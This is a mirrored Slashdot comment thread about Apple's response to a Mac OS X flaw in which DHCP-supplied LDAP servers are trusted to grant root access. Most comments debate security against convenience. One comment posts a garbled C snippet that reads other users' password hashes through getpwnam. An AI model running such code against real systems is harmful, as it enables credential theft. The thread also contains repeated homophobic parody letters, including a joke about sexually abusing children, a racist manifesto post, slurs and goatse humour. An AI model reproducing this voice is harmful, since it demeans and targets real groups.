Slashdot Mirror
Apple Responds to Exploit
Dave Schroeder writes, "This isn't so much of a root vulnerability as a default configuration that trusts the integrity of the local network services. This functionality has been around since NeXTSTEP, and is designed to allow for auto-configuration of new servers/machines brought into the network. The quick 'fix' for the vast majority of users who choose to implement it is to uncheck LDAPv3 and NetInfo altogether in Directory Access. Or, if LDAP services are used, just uncheck 'Use DHCP-supplied LDAP Server' in LDAPv3. ... One could argue that these features should be off by default, but if they are, it kind of wrecks the whole auto-configuration scheme." This sounds related to a great new feature in Mac OS X Server 10.3/Xserve called "automatic setup" that -- for machines that come with it preinstalled -- will get their address and LDAP server via DHCP and look for configuration files, and automatically configure the entire server, without any interaction beyond plugging it into the network and turning it on.
Take a bite of of this, Apple!
Primary post! Will of warrior!
What?Yyou are all guys filled with turkey birds?
Cognitive dissonance for the Mac cult?
Is nothing but an Apple apologist. Pretty sad that someone can be so suckered into something. Apple is OK, but they aren't perfect (no company is).
The domino effect is in place, and now that one backdoor is covered, I just read about a brand new one.
There goes' apples' "advantage" of supposedly being virus free.
The quick 'fix' for the vast majority of users who choose to implement it is to uncheck LDAPv3 and NetInfo altogether in Directory Access. Or, if LDAP services are used, just uncheck 'Use DHCP-supplied LDAP Server' in LDAPv3.
Yes that should be obvious to Mac users
It's a feature!
This
Please respond if you are a non-fudgepacker that own these overpriced, underpowered machines. I'd like to know if anyone with tight sphincters are macheads.
but it's as valid today as it ever was. There is a dichotomy between security and ease-of-use. Hitherto it has been impossible to have the one and the other simultaneously. Choose one.
Apple choose ease-of-use, and get criticised for leaving an open security "hole". Microsoft choose the same, and get criticised for (well, just about everything except wonderful marketing), and Linux chooses the other, and is criticised for poor ease-of-use.
That's not to say it's impossible, but it needs more than the current level of effort that goes into multi-node design. Apple is taking the first steps, and they've been somewhat burnt. Let's hope that doesn't discourage them from carrying on down the path... Unix as a genre can only learn from a successful easy-to-use and secure implementation of multi-machine computing. The thing is that you only learn by trying....
Simon.
Physicists get Hadrons!
Apple adds nothing, changes nothing, fixes nothing...
At the very least, it would be nice to have seen an update that automatically fixed this for the hundreds of thousands of users who are vulnerable and not reading random Apple tech notes.
Even if the bad guy has to be on your subnet, a vulnerability is a vulnerability and it would've been nice to see this taken a little more seriously. I know plenty of people running WEPless Airport at home, and this could be the method of attack from the front yard...
If nothing else, this seems like a potential method for a virus to be transmitted within a subnet from one trusted machine to another.
So c'mon Apple... how 'bout a little more of a response?
Realistically, an issue trusting the LDAP server that your DHCP server points you at?
What is the world coming to?
Do I need to manually verify every single setting supplied to me by my DHCP server because I don't trust it?
These days, the internet is not a safe place, we all need to be more than just a little paranoid - but are you paranoid enough?
Visit CryptoGnome in his home.
Thanks for your letter. Being Catholic myself, I know exactly what you're talking about! It has always been our plan here at Apple Computer Inc to revolutionize personal computing with our high-quality and highly gay products.
I'm happy to answer your letter by letting you know that YES we will be releasing an entire hLife ("homo-life") software line. You'll be able to recognize it in stores by the small stylized logo depicting a large cock entering a tight anus with an Apple logo on it. ("Suddenly it all comes together" indeed!).
Anyway, I hope you and other members of our community will join us on our mission, and purchase the exciting new hLife boxed set. Only the boxed set comes with translucent cock rings!
Sincerely,
Harry Rodman
Vice-president
Homosexual Liaison Services
Apple Computer, Inc.
It's about damn time they found an explot for an Apple computer!
Goo goo g'joob.
No matter what sort of spin Apple puts on it, it's still retarded of them to trust LDAP to the point that UID=0 is trusted to be root.
Still, I don't think that this exploit is really that easy to take advantage of... the circumstances which would lead to it are fairly limited for now (until WiFi is as pervasive as air, anyway).
... Just realign the jefoerys tubes and reroute the power from the conduits!
This is horrible... First the machine comes with a pre-configured backdoor/exploit, and they want to leave it like this? Second, if you can just plug in the machine in a network, and have it totally configure itself, you've just killed a job for an IT guy... and we need all the jobs we can get...
;)
Oh, wait... once the new machine gets owned by some script kiddies, then the IT guy gets called... okay... phew... nearly thought that a job was eliminated... nevermind... as you were...
---
Programming is like sex... Make one mistake and support it the rest of your life.
I wonder what new bug is waiting in their "automatic setup" to bite us.
.local tld with their Rendezvous/mDNS crap.
I was recently bit by their hijacking of the
(and when you call their support to ask why the Mac cannot see the local mail server called x.y.local, they have no idea and tell you to go around asking in web forums!)
So whatever they do and sell you as "making things easier", I would be very afraid to have it on my network.
Dear Apple:
I bought an Apple computer because of its native support for teledildonics. I bought a USB FUFME and MacOS immediately recognized it and installed drivers instantly! As a gay Catholic priest who often can't be at the altar all the time, you can understand how the ability to have sex with children whilst on the airplane with my Powerbook and wireless internet service is a lifesaver.
I just have a single question, will Apple be releasing a firewire version of the FUFME anytime soon?
With much gayness,
Father Michael "Arminass" Sims
This problem is rather simple... Operating systems such as Windows and MacOS X (don't troll me with Darwin) are commonly developed inside corporate environments, and a direct connection to the internet rather than a firewalled lan is the exception, rather than the rule. When the pointy haired boss walks in and requests a machine than can set up itself when he plugs in to the network, it gets delivered.
I expect retail software geared to the home user will continue to keep the tendancy of shipping flawed, because development often does not take place in a home environment. This goes for everything from Quake servers (remember ID's backdoor?) to all of the $40 photo-editing tools that are sold at Wal-Mart with marketing emphasis on the end user, with interfaces so all-encompasing, wizard-heavy, and dumbed-down that even I don't attempt to tech my low-tech friends how to use them.
apple should throw some of those boxes towards the debian sys admins and save them some time. god forbid one configures a new server on the internet
...it's about *how it's handled*.
All software is, and will continue to be for the forseeable future, vulnerable. The question for the users and security people is, "How will company x handle themselves when a vunlerability is discovered in their product?"
This question, and its answer, is the most important issue when deciding who you trust with your data.
dmiessler.com -- grep understanding knowledge
and they will send a refurbished mac back to you.
All for the low, low price of $300. As a bonus you get a free iPod battery and a 50 page installation manual.
Just press the # key when you ring Apple support and tell them that Pudge sent you.
Dear Father Sims
Thank you for your kind letter! Being a former Catholic priest myself, I know exactly what you are talking about! It has been our dream at Apple Computers ever since we began in the 80's to shape the homosexual experience with the ultimate computer.
I can answer your letter by saying that YES we will indeed be making a firewire version of the FUFME. With the additional bandwidth offered by the firewire bus, we will be able to more accurately record and deliver more minute and subtle movements that the USB FUFME simply couldnt support due to lack of bandwidth. You will be able to recognize our firewire FUFME in stores by the fancy holographic logo of a cock entering an Apple.
We are glad to help loyal customers such as yourself. If you ever have any more questions, feel free to drop a line (or connect to my teledildonic FUFME server on fufme://cockman.apple.com).
Hugh G. Cockman
President
Homosexual Liaison Services
Apple Computer, Inc.
really, from apples docs, you have to have a malicious dhcp server on your subnet. of course, someone could bring a rogue box into work, but this isn't on par with ms exploits. wouldn't a simple mac address filter at the switch level take care of all this. yeah, you could instal dhcpd on your authorized client, but this should also be a fairly easy thing to detect. i think apple is right, it's a configuration level solution.
My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
calling this an exploit is downright foolish. -j
Its an exploit by all means.
Its like calling a bug a "feature"
ALSO: WAHT THE FUCK is a 'jefoerys tube'?!?!??!?
In many discussions, people downplay the importance of exploits like these because the attacker has to be on your local network to take advantage of the security hole. What about all of the mis-configured (or deliberately) open wi-fi networks out there? I think that wireless networking has changed the importance of "local exploits" by allowing somebody passing by to become a local entity on an open wi-fi network.
Problems such as this show that any computer can be insecure. It's not just an Apple or M$ issue. Every system has weaknesses (even a *nix box) and the only why the guard against them is through vigilance and education. Learning of the exploits and fixing them. In my opinion the more knowledgeable the user (or Admin for networks) the more secure the system. 'Nuff said. Now we can get back to the usual M$ vs. Apple pissing contest that we all love.
I think I think, therefore I think I am.
This problem seems little worse than other problems related to DHCP. If someone had access to your subnet and was able to configure a rogue DHCP server (e.g. to exploit the OS X ldap bug) they could just as easily return a rogue proxy as the default gateway or a tainted DNS server. If you are not vigilant about SSH warning messages or best practices you could be connecting to a server which is just recording your password and passing it along to the real server.
There may be something I missing, but this does not seem to be a problem with Mac OS X as much as it is with DHCP. DHCP in its simplest form is not secure. Using DHCP on a subnet requires trust. As with any other kind of security you will have to trust something, whether it is your computer or your home network.
I hope people do not blow this bug out of proportion too much.
The more they overthink the plumbing, the easier it is to stop up the drain.
Muslim community leaders warn of backlash from tomorrow morning's terrorist attack.
A friend of my brother's recently found this one in OSX: Link to his blog entry about it
Not SO bad, but could be bad, and it's considerably more dangerous for known Unix nerds.
I don't mind this at all.
:-)
No professional I know connects a server to the network BEFORE they configure security and network settings.
Shame on you if you do
Shows that Unix is not the way to go.
FOAD
In this case, the software is actually more vulnerable in a work environment, because it requires a compromised DHCP server on the local subnet. Most home users would probably notice if you plugged in another computer in their house. It's less likely to be noticed in a corporate environment, at least for long enough to compromise a few servers.
Besides, if it's possible for someone to sneak a compromised DHCP server on your network, you're basically screwed anyway.
I warned you...
A professor at the University of Mississippi is giving a
lecture on the supernatural. To get a feel for his
audience, he asks: "How many people here believe in
ghostses?" About 90 students raise their hands.
"Well, that's a good start. Out of those of you who
believe in ghostses, do any of you think you've ever seen
a ghostse?" About 40 students raise their hands.
"That's really good. Has anyone here ever talked to a
ghostse?" 15 students raise their hands.
"That's great. Has anyone here ever touched a ghostse?" 3
students raise their hands.
"That's fantastic. But let me ask you one question
further... Have any of you ever made love to a ghostse?"
One student way in the back raises his hand.
The professor is astonished and says, "Son, in all the
years I've been giving this lecture, no one has ever
claimed to have slept with a ghostse. You've got to come
up here and tell us about your experience."
The redneck student replies with a nod and a grin, and
begins to make his way up to the podium. The professor
says, "Well, tell us what it's like to have sex with a
ghostse."
The student replies, "Ghostse?!? From ah-way back there ah
thought yuh said "goatse."
--
Mamma look!
I bought an Apple computer because of its native support for teledildonics. I bought a USB FUFME and MacOS immediately recognized it and installed drivers instantly! As a gay Catholic priest who often can't be at the altar all the time, you can understand how the ability to have sex with children whilst on the airplane with my Powerbook and wireless internet service is a lifesaver.
I just have a single question, will Apple be releasing a firewire version of the FUFME anytime soon?
With much gayness,
Father Michael "Arminass" Sims
But WILL correct your spelling. Jefferies tubes. Looking at a trek encyclopedia right now.
I just tested it. It is real.
Maybe we deserve this world ?
The server configuration feature is similar, but it isn't directly related to the DHCP security issue. The server configuration is specifically for cluster-type configurations where you want a server to boot up with a basic configuration automatically. You can also load the configuration from a file via a USB keychain or even an iPod. It's just a small XML file with all the configuration info.
Theoretically a hacker could exploit this as a "security" hole, but they would need to set up a local LDAP server to give out the configuration, and they would need to reboot the Xserves. They could just as easily go up to the Xserve and reload the OS from CD.
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
You are the biggest loser I have ever encountered. Your use of acronyms is retarded. Go get a life instead of subjecting us to your foolish troll-wit. Fuck off.
.... turns out, if someone had RTFM, nobody would be talking about this.
Thank you for your kind letter! Being a former Catholic priest myself, I know exactly what you are talking about! It has been our dream at Apple Computers ever since we began in the 80's to shape the homosexual experience with the ultimate computer.
I can answer your letter by saying that YES we will indeed be making a firewire version of the FUFME. With the additional bandwidth offered by the firewire bus, we will be able to more accurately record and deliver more minute and subtle movements that the USB FUFME simply couldnt support due to lack of bandwidth. You will be able to recognize our firewire FUFME in stores by the fancy holographic logo of a cock entering an Apple.
We are glad to help loyal customers such as yourself. If you ever have any more questions, feel free to drop a line (or connect to my teledildonic FUFME server on fufme://cockman.apple.com).
Hugh G. Cockman
President
Homosexual Liaison Services
Apple Computer, Inc.
This sounds related to a great new feature in Mac OS X Server 10.3/Xserve called "automatic setup" that -- for machines that come with it preinstalled -- will get their address and LDAP server via DHCP and look for configuration files, and automatically configure the entire server, without any interaction beyond plugging it into the network and turning it on.
Slashdotter A: "Are we being sarcastic?"
Slashdotter B: "I can't even tell anymore."
...so that he could lift your wallet.
Jesus was black.
White people shipped black African people to the USA on boats in locks and chains and made them slaves.
The white man owns all the businesses and continues to discriminate against blacks keeping us as slaves. Whites will never give blacks important jobs or security.
The whites are against affirmative action cause they are scared that the black man will get his equal share.
The black man must take power from the whites so we they can no longer throw us in prison. White cops are known for racial profiling and beatings of blacks.
White crackers are so dumb that they can not jump or slam dunk a basketball.
Honkeys have no rhythm and are unable to dance.
White girls prefer black men over white men but are kept away by white condemnation.
Whites take it out on successful people in our community and have arrested brothas & sistas including OJ Simpson, Mike Tyson, Rosa Parks, Puff Daddy, Snoop Dog, Jessie Jackson and Al Sharpton.
Our group will fight to rid people like Mark Furman, Trent Lott, David Duke, all the NYC cops who beat up Rodney King, Abner Louima and many others.
Our goals include:
-Slavery reparations.
-Affirmative action and equal housing opportunities.
-Higher earned income & child credit for African Americans.
-Send African Americans to school and not prison.
-A black police force.
-Black schools which the government should pay for.
Interested in helping us achieve our goals?
Want to join our group? You can e-mail our group's president Brian Keffer.
Email:
bkeffer@thecommandline.org
from the dictionary --
One who is zealous; one who engages warmly in any cause, and pursues his object with earnestness and ardor.
Doesn't sound so bad to me. Are you a Linux zealot? A Windows zealot? Does having a strong opinion make you a zealot? Or are you opinionless.
You are the lemming. Spewing the same tired crap about 'Mac zealots'.
Shut up, Anti-Mac zealot.
Tihs is a public service announcement.Adrian has incredibly baggy pants. Really - they're like tents!
"'I pass the test,' she said. 'I will diminish, and go into the West, and remain Galadriel.'"
- JRR Tolkien.
Thats like saying "We have dozens of crimes in those countries that allow more freedoms than us"
Apple = Dictators.
Apple Users = Sheep.
Apple Zealot = Particularly angry sheep.
Windows = Freedom
Microsoft = USA
God Bless America.
This isn't so much of a root vulnerability as a default configuration that trusts the integrity of the local network services.
That is a root vulnerability. You could perhaps trust LANs 20 years ago, you absolutely cannot trust them today, and any vendor that ships software that, by default, trusts the LAN is shipping software with severe security problems.
Grow up you twelve year old...I knew what those tired acronyms meant when you were begging your parents for lunch money...
YOU HAVE BEEN TROLLED -- YOU HAVE LOST -- HAVE A NICE DAY -- FUCK OFF AND DIE you loser...
P.S. I DO own a Mac. I AM more sucessful than you'll ever be thanks to it. I NEVER crow about either of those facts except when some snot-nosed slashdot/linux wanabee tries to make something of it. Go back to pretending that you have some stake in Linux and that you are fighting some sort of 'good fight' -- bottom line is, I know you are a fake, you know you are a fake -- no one who actually contributes to something as marvelous as Linux/open-source would be as rude/crass/intolerant as you -- I know you haven't been around these parts as long as I have, and you now know that YOU HAVE LOST...NEEEEEEEEEXT
When you think about it, there are literally hundreds of Macs out there, many of which are connected to the Internet. Obviously this could cause a huge problem.
Then professionals wouldn't mind manually typing in the LDAP server address, which means this entire feature is worthless.
Hmm, as long as they don't have to right-click anything, I guess they should be able to handle it.
not that there's anything wrong with that.
1. Don't use .local for your subdomain /etc/named/ (which effectively disables a large chunk of Rendezvous)
2. Disable Rendezvous' broadcast-based resolver by hacking on the stuff in
Despite their preference for using Macintoshes, they're for the most part regular people just like you and me. People really need to learn some tolerance for people that are different.
Mod me down if you must, but if we don't learn to live together harmoniously it's just going to cause more suffering in the future. And I don't want to hear any stupid comments like, "Well, they should just switch to PC's" because it's not a choice that they make. They're just born that way.
Glad I got that off my chest.
This doesn't sound much different from MS's way of leaving most services turned on and wide open by default.
It seems like Apple's public image prevents them from publishing more information about possible exploits. If it doesn't fit with the image of "easy-to-use!", they leave it up to someone else to publicize. It's a great idea to have automatically-configured machines, but these things need to be well-known. As is so often the case, education is the most important part of the equation.
Now I'll have to search my home every morning when I wake up, to make sure nobody's broken in and placed a rogue machine providing DHCP and LDAP services on my LAN.
Wake me when there's a real Mac OS X exploit that's as bothersome as say, Blaster.
Speaking of Windows vulnerabilities, seven more were discovered recently in Internet Explorer. Is the total number of IE security holes up to four digits yet? We must be getting close.
Security and convenience do not mix. Apple is basically saying that their OS will continue to be insecure by default so users can enjoy convenience. PC's have a similar vulnerability, well ones that try to netboot by default. A rogue PXE server could feed a backdoored kernel to netbooting clients that mounts and runs the default root partition. Users, unless they pay attention to what their PC just booted off of, won't know anything is wrong. Netbooting is another convenience issue, who can argue with media-less booting!
Ecept these boxes are not for professionals.
Before anyone says "macinista", I've been using computers all day every day for 25 years now (since i was eight or so), and was a commodore man if you must know. I only got my first mac about two years ago. However, I will no longer have anything but a mac in my house because MacOS X based macs do everything I need - including a high quality X server - and never, ever, break. I'm a Solaris admin all day for a very large company. I don't want to hassle with munged computers at home. I prefer to farm.
"He who would learn astronomy, and other recondite arts, let him go elsewhere. " -- John Calvin, commenting on Genesis 1
Anyone who manages to get a directory server on their network better be a professional.
-- will get their address and LDAP server via DHCP and look for configuration files, and automatically configure the entire server, without any interaction beyond plugging it into the network and turning it on.
Reminds me of a user who left the Windows 2000 Professional CD-ROM in his CD-ROM drive, booted from it, and reinstalled Windows. Though, he did have to "answer a few questions" (i.e. Press R to reinstall Windows).
I'd say it's one more nail in Microsoft's coffin. Apple once again comes through with a sleek and efficient design. The process to accidentally reinstall the OS is completely automated!
I was browsing a local windows network I set up the other day and saw a shared folder that was NOT previously made shareable. It seems one of the new Windows patches re-enables the "shared documents" folder on the network, and in explorer it's misleading because it doesn't use the standard "hand-looking" shared folder icon. I am really sick of this intentional and misleading crap by Microsoft! Apple should set a higher standard in this area by making sure everything is straightforward and on high security by default.
Unless I'm mistaken, I read that Google uses a similar autoconfiguration for servers. They buy the server, plug it in, turn it on, and the rest is all automatic. I'm pretty sure they use a Linux distro, but it'd be cool for big institutions if OS X could have this functionality.
Sorry to release this 'sploit "into the wild" without warning Microsoft, but I figured it was important to warn Win9x system admins ASAP. I also thought that Microsoft has had plenty of time to find/fix this major flaw --it is 2003...
In light of the recent Debian break in, where the core servers were rooted and a rootkit installed on other machines, and all this using ldap for user authentification, I think Apple is making a huge mistake. All it needs is a couple of apple machines to be rooted by an exploit based on this and Apple will be in the same sorry boat that MS is in.
(And for the zealots, I'm posting this from a G4 PB so STFU thanks.)
Ah ahem, several storage servers like Snap and etc also come with this 'feature'..
and those run Linux...
Don't Tread on OpenSource
[o]_O
It seems to me you proved his point.
... hmmm, Hasn't found anything that works well on a PC. Um maybe whe hasn't looked in the past ... 10 years.
Your father used macs when they were good. Kept on using them when they weren't good because he didn't investigate anythign else ( can anyone say blind Zelot?
The artist uses a mac
You see the reason everyone calls mac users stupid is that they always assert that macs are always better. Even when they obviously aren't. So nobody believes them when they are faster. PC's change on such a quicker timescale that anything that is better on a mac is only better for a couple of months before it gets trumped. And it stays worse for another 3 years befo9re Apple comes out with some thing new.
Or at least fair compensation, for gods' sake!!!
Since this is an autoconfiguration feature, why not have it on only for the first boot after installing the OS? This way the computer can autoconfigure and then when it is configured it turns the feature off again.
The interactive way to Go -- http://www.playgo.to/iwtg/en/
The messenger service is used by many orginazations for alerts. Where I work, our servers use it to send alerts to those that manage them. Works well since, unlike e-mail, it will get immediate attention. A web browser that is able to execute scripts is much more complex and therefore venurable than one that just doens't execute code at all.
Get off it, when you provide services to the world, you open yourself to the poiibility of getting hacked. Look at Linux. Consider the holes in OpenSSH. Is it essential? No. Is it useful? Hell yes. When you run services that the whole world can get at, you run the risk that there is a flaw in the coding that someone exploits.
Now, a valid solution to this is to have everything turned off and/or locked down by default. Ok, that works, but is a pain in the ass (read not easy to use) since you must then figure out how to enable everything and make it work. IF you have useful services enabled by default, it runs the risk they are venurable and can be exploited by default.
By the way, if you have to reinstall Windows continually, you need to get some skills with Windows. To fuck it up that often and that bad indicate poor skills of the user.
We had to track down and have arrested a haxs0r that was spoofing our router in an attempt to capture passowrds. He could have also easily done this with a DHCP server (well, had he been intelligent enough to make his software work). When tou run a network that offers some kind of public access, and there are a great many, you run the risk of infiltration. Plus, do you trust ALL your employees?
Security is not simple, and the balance between security and usability is even more complex.
I always wondered why there wasn't a sandbox approach to this automatic networking stuff... something to the tune of:
Plug new PC in, a daemon listens/pings for DHCP, LDAP, whatever... and if it finds it, politely asks the user if he/she would like to enable the service. If you have admin privileges you get to authenticate and proceed to register with the service or if in an untrustworthy environment you can choose to leave them disabled. If a new server is found at any time the process is repeated... though you could set a preference to ignore new servers as well.
See, sandbox. Requests are let in automatically but service must be opted into manually.
A fool throws a stone into a well and a thousand sages can not remove it.
Before misleadingly filling your comment with "IETF", maybe you should read a few IETF documents and join their working groups yourself.
.local tld, and not only did the IETF never recommended that it be reserved for Apple's Rendezvous, but in fact, had "concerns about multicast storms resulting from site-wide mDNS usage, as well as concerns about cache pollution" (among others).
I will gladly admit that mDNS doesn't have to be crap in itself, and may be cool, but Apple's proposed implementation is NOT going through the IETF standards process.
And Apple IS hijacking the
What they eventually adopted in the standards track is LLMNR.
LLMNR also doesn't require suddenly taking over a widely used tld.
Also: "Rendezvous is an individual submission that is not a work item of any IETF working group, and is currently not an IETF standard. While it is possible for an individual submission to become an IETF standard, this is unlikely in this case because an existing WG (DNSEXT) is already working on a competing protocol (LLMNR), which has just completed DNSEXT WG last call."
See the LLMNR FAQ.
Anyone know how to make a Mac work as a DHCP client in the first place??
We plugged one into our network, just wanting to use the web browser, and spent several hours wandering round all the network configuration dialogs we could find. We could find nothing at all that would persuade the Mac to actually go and ask the DHCP server for an IP address. (So we junked it and carried on just using real computers.)
However, looking at the documents themselves (draft-ietf-dnsext-mdns-24.txt and draft-cheshire-dnsext-multicastdns.txt), it's not immediately obvious which one is farther along. They are both Internet-Drafts in the "standards track" category. I didn't realize that Microsoft's protocol was a work item of DNSEXT while Apple's was not.
main(c,r){for(r=32;r;) printf(++c>31?c=!r--,"\n":c<r?" ":~c&r?" `":" #");}
So Osama's not only against the American Way of Life, democracy, human rights and bikinis but also hates the Clintons? WOOT, Hillary for President! =)
Don't think of it as a flame---it's more like an argument that does 3d6 fire damage
Apple's got a ways to go before they're really on the ball with security. I generally run their security update feature every day; I just got the patches for OpenSSL and zlib a week ago. Also, there's a bug filed in OpenDarwin that works in Jaguar and, I'm disappointed to see, also works in Panther.
, p->pw_passwd,p->pw_uid,- >pw_gecos,p->pw_dir,
Run this as any user with an argument of any other user's username. Pay careful attention to the second field.
#include
#include
int main(int argc, char **argv)
{
struct passwd *p;
p = getpwnam(argv[1]);
printf("%s:%s:%d:%d:%d:%d:%s:%s:%s:%s",p->pw_name
p->pw_gid,p->pw_class,p->pw_change,p->pw_expire,p
p->pw_shell,p->pw_expire);
}
Don't bitch at me about publishing this. It's already available in the OpenDarwin bug list.
www.sitetronics.com/wordpress
The 10.3.1 patch corrects this flaw, but there is still no patch available for 10.2. This flaw was mentioned a month ago on various Mac websites, I should have done my homework.
Maybe we deserve this world ?
All those asterisks must imply that the user's password is a swear word which has been censored!
When I ran the directory access utility, LDAPv3, NetInfo, Rendezvous, SLP, and SMB where all turned on. My question is, do I need any of them running? I am on a stand alone computer on a DHCP enabled cable modem.
The guy's anecdote is wrong? His father wasn't sucessful during those 'dark middle ages' when his Mac 'wasn't good'? His artist friend should arbitrarily change platforms to 'save' a couple hundred bucks(money lost after purchasing new software)?
I don't want anyone to switch to Macs -- trust me. Apple will be around a long, long time. They do not need to be the most ubiquitous platform -- If I never bought another computer, I could be happy with my last Apple laptop and my present software collection for a few decades - if not forever. Sure I'll fall behind the 'gaming world' somewhere around 'Doom 6' but I never said I wouldn't buy a new console...
We apologise for the fault in this post. Those responsible have been sacked. -- Signed RICHARD M. NIXON
I know this might be a newsflash for all you homophobic teen-geeks out there, but some of us actually WORK on our computers. There is this thing called a paycheck -- kinda like your 'allowance' only you don't get it handed to you from Daddy for having been shat out of your Mommy's box...
And the size of that 'paycheck' while never a direct indicator of success, can be objectively used to infer the relative merit of the tools at hand. I use a Mac. I make money using a Mac. I am sure I could make money using Windows, but why? So I can play some games while I'm not working? I leave that to you guys in the dorms...
Go suck Bill Gates' cock you weasel-loving uncle fucker.
Calling the autoconfig "feature" a root exploit is no different than calling the Win9x login one either.
Here's another exploit you can ignorantly mod down: The telnet protocol is unencrypted!! The entire telnet session, including usernames and passwords can be sniffed.
HA. That post should be moderated +10 Side-splittingly hilarious
if you could spell. So much for 'educated opinions' from PC users. You make me laugh.
If you have a user account that was present in 10.2, it stays as it was in 10.2 - i.e. the password is world readable and limited to 8 significant characters. If you make a new account in 10.3 or even change the password of an existing account that was brought over from 10.2 to 10.3, then the new password handling will take effect: shadow passwords and a larger number (I don't recall how many) of significant characters.
What is not fully documented is that if you have multiple network locations, you have to deselect this checkbox for each location. Fortunately, this is straightforward since there is a network location pull down menu right above the checkbox.
Note that this means you can leave it checked for trusted networks but uncheck it for untrusted networks.
Bitch at MS for suggesting a non-standard .tld for private domains.
.local for SBS. Why not? It's a perfectly natural choice for an internal domain. That's why I had choosen it many years ago, like many other netadmins. If MS does the same I have no objection. It is perfectly valid and doesn't break anything.
.local as a local tld and it is widely used.
.local
I do like bitching at MS, but this is not a good occasion.
Yes, I discovered yesterday that MS suggest
There is nothing "non-standard" in using
The way Apple uses it does break valid existng TCP/IP functionality.
Apple's simply following the Zeroconf RFC, which specifies
I can also write an RFC, not listen to the objections, and follow my own RFC whatever the consequences. It wouldn't make my RFC a valid Internet standard.
This could have been just a little glitch in OS X. But the way they treated it, they appear to be just as arrogant as MS.
They always said that you would never be anything.
Everything you tried to do was just a waste of time.
But you believed you could do any sex you wanted to.
You made your mind up and you came from behind.
Don't let them try to tell you what computer to buy
Don't let them hold you back, don't ever change your mind.
Homosexuality - Be proud of what you are
Homosexuality - Don't let them cut you down
You can buy whatever comp you want to buy,
But don't change from Apple for society.
Don't lose your Homosexuality.
The years go by, you find that pudge cums easily.
And the world is full of people tryin' to rape your ass.
Don't ever turn your back on anything you've ever been.
You don't need to prove yourself to anybody else.
Don't let them try to tell you what computer to buy
Don't let them hold you back, don't ever change your mind.
Homosexuality - Be proud of what you are
Homosexuality - Don't let them cut you down
You can buy whatever comp you want to buy,
But don't change from Apple for society.
Don't lose your Homosexuality.
There's no room for second best, no second chance, don't fail the test,
Gotta rise above the rest, gotta try to make your mark.
You don't need to be so vain, no need to act so proud,
Follow the trendies, don't ever stand out from the Apple crowd.
Do you really care what other people want to do to you?
Does it really matter what they do or if they're gay?
You've fucked too hard to let them cum all back in your face.
When their Apples never mattered anyway.
Don't let them try to tell you what computer to buy
Don't let them hold you back, don't ever change your mind.
Homosexuality - Be proud of what you are
Homosexuality - Don't let them cut you down
You can buy whatever comp you want to buy,
But don't change from Apple for society.
Don't lose your Homosexuality.
Don't lose your Homosexuality.
Don't lose your Homosexuality.
..for vulnerablities. "We're just trying to do it FOR you".
Joe
"Artificial Intelligence usually beats real stupidity."
Because of problems when switching locations.
As noted in Apple's article 25442:
This document discusses how to resolve an issue in which applications may sometimes take longer than expected to open (they "bounce" on the Dock for longer than expected) after changing locations or networks (including wireless networks).
Solution
Note: You should not use this solution if you rely on NetInfo services. If you are unsure, contact your network administrator.
1. Open Directory Access (/Applications/Utilities).
2. Authenticate if necessary.
3. Deselect NetInfo.
4. Click Apply.
and if netinfo is causing problems, why not uncheck everything else you don't need, including LDAP.
The whole point of network account management is to easily allow the network administrators to have administrative rights on the machines on their network.
/me wonders about Kerberos and DNS SRV records ...
Most any LDAP authentication setup on a unix system will allow a uid=0 user defined only in LDAP to log in (and essentially be root). That's the whole point.
The problem that needs to be solved is making this both secure (preventing rogue DHCP/LDAP servers causing exploits) yet easy to set up.
One possible solution would be to require TLS and SSL certs signed by a (manually-installed) CA cert.
What was your proposal?
* Anything excludes most major Windows-based OEMs. :D
I have to disagree with this particular statement. I attempted to install Photoshop by dragging the Photoshop.app just the other day and it complained copiously about missing/wrong-version stuff, and quit before it finished starting.
.app. If I decide I hate something, I can just trash it and be done (Useful for MSIE). I save a lot of time not going to Start > Control Panel > Add/Remove Programs 3x a day.
As for your general point, yes, at least 90% of the apps on my machine are one
It seems only the truly huge apps like PS, Dreamweaver, MS Office, need installers. A lot of apps, the official AIM client (I know, I know--suck) being one example, can be installed by dragging the executable, even though they're distributed with an installer. I know this because I keep that client stored in a DMG whenever I'm not using it due to its buggy, slow nature).
About Directory Access
Directory Access determines which directory services a Mac OS X computer uses and how it connects to specific directory domains. Directory Access determines how the computer discovers network services. Directory Access also defines search policies for finding authentication and contacts information in specific directory domains.
For more information about directory services, network service discovery, and authentication and contacts search policies, click "Tell me more."
Get the advice of a network administrator before changing Directory Access settings. If your computer is at home, you shouldn't need to change settings in Directory Access unless you are setting up a home network with a server.
If you are a network administrator and want help changing settings in Directory Access, open Directory Access and choose Help > Directory Access Help.